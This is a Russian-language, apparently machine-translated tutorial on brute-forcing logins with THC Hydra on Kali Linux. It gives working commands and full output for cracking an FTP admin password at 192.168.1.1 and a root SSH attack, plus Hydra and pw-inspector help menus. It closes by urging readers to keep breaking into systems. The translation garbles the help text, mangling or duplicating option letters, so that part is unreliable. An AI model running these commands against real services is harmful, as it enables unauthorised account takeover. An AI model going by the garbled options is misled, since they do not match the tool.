Взламывайте пароли в Kali Linux с помощью Hydra

  1. Поддерживаемые платформы
  2. Справочное меню THC hydra - нажмите, чтобы развернуть
  3. Пример использования гидры
  4. Дополнительные инструменты в комплекте с THC Hydra
  5. Справочное меню pw-inspector - нажмите, чтобы развернуть
  6. Пример использования pw-inspector
  7. Ресурсы

В течение многих лет эксперты предупреждали о рисках использования слабых паролей для ограничения доступа к данным, и это по-прежнему остается проблемой. Практическое правило для паролей тем дольше, тем лучше. В этом руководстве я буду использовать FTP в качестве целевой службы и покажу, как взламывать пароли в Kali Linux с помощью Hydra. В течение многих лет эксперты предупреждали о рисках использования слабых паролей для ограничения доступа к данным, и это по-прежнему остается проблемой

Уже доступно несколько инструментов для хакерских атак, однако ни один из них не поддерживает более одного протокола для атаки или не поддерживает параллельные соединения. Ранее мы рассмотрели взлом паролей с использованием Джон Потрошитель , Wireshark , NMAP а также MiTM ,

Hydra может быть использована и скомпилирована без ошибок в Linux, Windows / Cygwin, Solaris, FreeBSD / OpenBSD, QNX (Blackberry 10) и OSX.

В настоящее время инструмент THC Hydra поддерживает следующие протоколы:

Звездочка, AFP, Cisco AAA, аутентификация Cisco, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS -FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-прокси, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, слушатель Oracle, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3 , POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP / R3, SIP, SMB, SMTP, перечисление SMTP, SNMP v1 + v2 + v3, SOCKS5, SSH (v1 и v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet , VMware-Auth, VNC и XMPP.

Поддерживаемые платформы

  1. Все платформы UNIX (Linux, * BSD, Solaris и т. Д.)
  2. Mac OS X
  3. Windows с Cygwin (как IPv4, так и IPv6)
  4. Мобильные системы на базе Linux, Mac OS / X или QNX (например, Android, iPhone, Blackberry 10, Zaurus, iPaq)

Hydra - это параллельный взломщик входа, который поддерживает множество протоколов для атаки. Это очень быстро и гибко, и новые модули легко добавлять. Этот инструмент позволяет исследователям и консультантам по безопасности показать, как легко получить удаленный несанкционированный доступ к системе. В Ubuntu его можно установить из менеджера пакетов synaptic. На Kali Linux он установлен.

Для перебора Гидры нужен список паролей. Есть много списков паролей, доступных там. В этом примере мы будем использовать список паролей по умолчанию, предоставленный Джон Потрошитель который является еще одним инструментом взлома пароля. Другие списки паролей доступны онлайн, просто Google его.

Список паролей, предварительно установленный в Kali Linux, и его список паролей можно найти по следующему адресу

/usr/share/john/password.lst

Это выглядит так

#! comment: этот список был составлен Solar Designer из Openwall Project, #! comment: http://www.openwall.com/wordlists/ #! comment: #! comment: этот список основан на паролях, наиболее часто встречающихся на набор комментариев Unix #!: системы в середине 1990-х годов, отсортированные по убыванию числа вхождений # комментарий: (то есть, более общие пароли перечислены первыми). Это было #! Comment: пересмотрено, чтобы также включать общие пароли веб-сайтов из публичных списков #! Comment: из «топовых N паролей» от основных компромиссов веб-сайтов сообщества, которые #! Comment: происходили в 2006–2010 годах. #! Comment: #! Comment : Последнее обновление: 2011/11/20 (3546 записей) 123456 12345 пароль пароль1 123456789 12345678 1234567890

Создайте копию этого файла на рабочем столе или в любом месте и удалите строки комментариев (все строки над паролем 123456). Теперь наш список слов паролей готов, и мы собираемся использовать его, чтобы грубо заставить сервер ftp попытаться взломать его пароль.

Вот простая команда с выводом

[электронная почта защищена]

: ~ # hydra -t 1 -l admin -P /root/Desktop/password.lst -vV 192.168.1.1 ftp Hydra v7.4.2 (c) 2012 от van Hauser / THC & David Maciejak - только для юридических целей Hydra (http : //www.thc.org/thc-hydra) начиная с 2013-05-13 04:32:18 [DATA] 1 задача, 1 сервер, 3546 попыток входа в систему (l: 1 / p: 3546), ~ 3546 попыток для задачи [ДАННЫЕ] атакующая служба ftp на порту 21 [VERBOSE] Разрешение адресов ... выполнено [ATTEMPT] target 192.168.1.1 - войти в систему «admin» - передать «123456» - 1 из 3546 [child 0] [ATTEMPT] target 192.168 .1.1 - логин "admin" - передать "12345" - 2 из 3546 [child 0] [ATTEMPT] target 192.168.1.1 - логин "admin" - пройти "пароль" - 3 из 3546 [child 0] [21] [ftp ] host: 192.168.1.1 login: admin пароль: пароль [STATUS] атака завершена для 192.168.1.1 (ожидание выполнения тестов детьми) 1 из 1 цель успешно выполнена, найден 1 действительный пароль Hydra (http: //www.thc. org / thc-hydra) закончил в 2013-05-13 04:32:33 [электронная почта защищена] : ~ #

Проверьте строку «[21] [ftp]». Он упоминает комбинацию имени пользователя и пароля, которая работала для сервера ftp. Довольно легко!
Теперь давайте посмотрим на варианты. Опция t сообщает, сколько параллельных потоков гидра должен создать. В этом случае я использовал 1, потому что многие маршрутизаторы не могут обрабатывать несколько соединений и на короткое время зависали или зависали. Чтобы избежать этого, лучше делать 1 попытку за раз. Следующая опция - «l», которая указывает имя пользователя или логин для использования. В этом случае его админ. Далее идет заглавная «P» опция, которая предоставляет список слов для использования. Hydra подберет каждую строку как один пароль и использует его.

Параметр «v» предназначен для многословия, а параметр «V» - для обозначения каждого пробуемого пароля. Последним идет хост / IP-адрес, за которым следует сервис для взлома.

Справочное меню THC hydra - нажмите, чтобы развернуть

Справочное меню THC hydra - нажмите, чтобы развернуть

[электронная почта защищена]

: ~ # hydra -h Hydra v7.6 (c) 2013 от van Hauser / THC & David Maciejak - только для юридических целей Синтаксис: hydra [[[-l LOGIN | -L FILE] [-p PASS | -P FILE] ] | [-C ФАЙЛ]] [-e nsr] [-o ФАЙЛ] [-t ЗАДАЧИ] [-M ФАЙЛ [-T ЗАДАЧИ]] [-w ВРЕМЯ] [-W ВРЕМЯ] [-f] [-s ПОРТ] [-x MIN: MAX: CHARSET] [-SuvV46] [service: // server [: PORT] [/ OPT]] Опции: -R восстановить предыдущий прерванный / сбойный сеанс -S выполнить соединение SSL -S PORT, если служба находится на другом порте по умолчанию, определите его здесь -l LOGIN или -L FILE login с именем LOGIN, или загрузите несколько имен входа из FILE -p PASS или -P FILE попробуйте пароль PASS, или загрузите несколько паролей из FILE -x MIN: MAX: генерация паролей CHARSET, введите «-x -h», чтобы получить справку -e nsr, попробуйте «n» нулевой пароль, «s» - вход в систему как пароль и / или «r» - обратный вход в систему - цикл вокруг пользователей, а не паролей ( вступает в силу! подразумевается с -x) -C ФАЙЛОМ, разделенным двоеточием, в формате «login: pass» вместо -L / -P параметров -M Список серверов FILE, которые должны быть атакованы параллельно, по одной записи в строке -o ФАЙЛ записан, найден логин / пар пароль в FILE вместо stdout -f / -F выход при обнаружении пары логин / пароль (-M: -f для хоста, -F global) -t ЗАДАЧИ запустить ЗАДАЧИ число соединений в p параллельный (для хоста, по умолчанию: 16) -w / -W ВРЕМЯ ожидания для ответов (32 с) / между соединениями в потоке -4 / -6 предпочитают адреса IPv4 (по умолчанию) или IPv6 -v / -V / -d подробный режим / show login + pass для каждой попытки / режима отладки. -U подробности об использовании сервисного модуля: сервер целевой сервер (используйте либо ИЛИ, либо опцию -M), чтобы сервис взломал сервис (см. ниже о поддерживаемых протоколах). OPT Некоторые сервисные модули поддерживают дополнительный ввод ( -U для справки модуля) Поддерживаемые службы: звездочка afp cisco cisco-enable cvs firebird ftp ftps http [s] - {head | get} http [s] - {get | post} -форма http-proxy http-proxy-urlenum icq imap [s] irc ldap2 [s] ldap3 [- {cram | digest} md5] [s] mssql mysql ncp nntp слушатель оракула oracle-sid pcanywhere pcnfs pop3 [s] postgres rdp rexec rlogin rsh s7-300 sip smb smtp [ s] smtp-enum snmp socks5 ssh sshkey svn teampeak telnet [s] vmauthd vnc xmpp Hydra - это инструмент для угадывания / взлома действительных пар логин / пароль - использование разрешено только в юридических целях. Этот инструмент лицензирован под AGPL v3.0. Новейшая версия всегда доступна по адресу http://www.thc.org/thc-hydra. Эти сервисы не были скомпилированы в: sapr3 oracle. Используйте HYDRA_PROXY_HTTP или HYDRA_PROXY - и при необходимости HYDRA_PROXY_AUTH - среду для настройки прокси. Например:% export HYDRA_PROXY = socks5: //127.0.0.1: 9150 (или socks4: // или connect: //)% export HYDRA_PROXY_HTTP = http: // proxy: 8080% export HYDRA_PROXY_AUTH = user: pass Примеры: hydra -l пользователь -P passlist.txt ftp://192.168.0.1 гидра -L userlist.txt -p defaultpw imap: //192.168.0.1/PLAIN гидра -C defaults.txt -6 pop3s: // [fe80 :: 2c: 31ff : FE12: AC11]: 143 / TLS: DIGEST-MD5

Пример использования гидры

Попытайтесь войти в систему как пользователь root (-l root), используя список паролей (-P /usr/share/wordlists/metasploit/unix_passwords.txt) с 6 потоками (-t 6) на указанном сервере SSH (ssh: // 192.168.1.123):

[электронная почта защищена]

: ~ # hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 ssh: //192.168.1.123 Hydra v7.6 (c) 2013 от van Hauser / THC & David Maciejak - для юридических только для целей Hydra (http://www.thc.org/thc-hydra) начиная с 2014-05-19 07:53:33 [ДАННЫЕ] 6 задач, 1 сервер, 1003 попытки входа в систему (l: 1 / p: 1003 ), ~ 167 попыток на задачу [DATA] атакующий сервис ssh на порту 22

Перебор - самая основная форма взлома паролей. Он хорошо работает с такими устройствами, как маршрутизаторы и т. Д., Которые в основном настроены с паролями по умолчанию. Однако, когда дело доходит до других систем, перебор не будет работать, если вам не повезет.

Тем не менее, грубое принуждение является хорошей практикой для хакеров, поэтому вы должны продолжать пробовать все методы взлома системы. Так что продолжайте взламывать!

Дополнительные инструменты в комплекте с THC Hydra

PW-инспектор

Он читает пароли и печатает те, которые соответствуют требованиям

Справочное меню pw-inspector - нажмите, чтобы развернуть

Справочное меню pw-inspector - нажмите, чтобы развернуть

[электронная почта защищена]

: ~ # pw-inspector PW-Inspector v0.2 (c) 2005 by van Hauser / THC [электронная почта защищена] [http://www.thc.org] Синтаксис: pw-inspector [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p - s Опции: -i Файл FILE для чтения паролей из (по умолчанию: stdin) -o Файл FILE для записи действительных паролей (по умолчанию: stdout) -m MINLEN минимальная длина действительного пароля -M MAXLEN максимальная длина действительного пароля -c MINSETS минимальное количество требуемых наборов (по умолчанию: все заданные). Наборы: -l строчные буквы (a, b, c, d и т. Д.) -U прописные буквы (A, B, C, D и т. Д.) -N числа (1,2,3,4 и т. Д.) -P печатаемые символы (которые не являются -l / -n / -p, например, $,!, /, (, * И т. Д.) -S специальные символы - все остальные не входит в наборы, указанные выше. PW-Inspector считывает пароли и печатает те из них, которые соответствуют требованиям. Код возврата - это количество найденных действительных паролей, если не найдено ни одного. Использование для безопасности: проверка паролей, если возвращается 0, отклонение пароля Выбор. Использовать для взлома: обрезать файл словаря в соответствии с требованиями pw цели. Использование разрешено только в юридических целях.

Пример использования pw-inspector

Прочитайте список паролей (-i /usr/share/wordlists/nmap.lst) и сохраните в файл (-o /root/passes.txt), выбрав пароли минимальной длины 6 (-m 6) и максимальная длина 10 (-M 10): [электронная почта защищена] : ~ # pw-inspector -i /usr/share/wordlists/nmap.lst -o /root/passes.txt -m 6 -M 10 [электронная почта защищена] : ~ # wc -l /usr/share/wordlists/nmap.lst 5086 /usr/share/wordlists/nmap.lst [электронная почта защищена] : ~ # wc -l /root/passes.txt 4490 /root/passes.txt

Ресурсы

Источник: http://www.thc.org/thc-hydra/

  • Автор: Ван Хаузер, Роланд Кесслер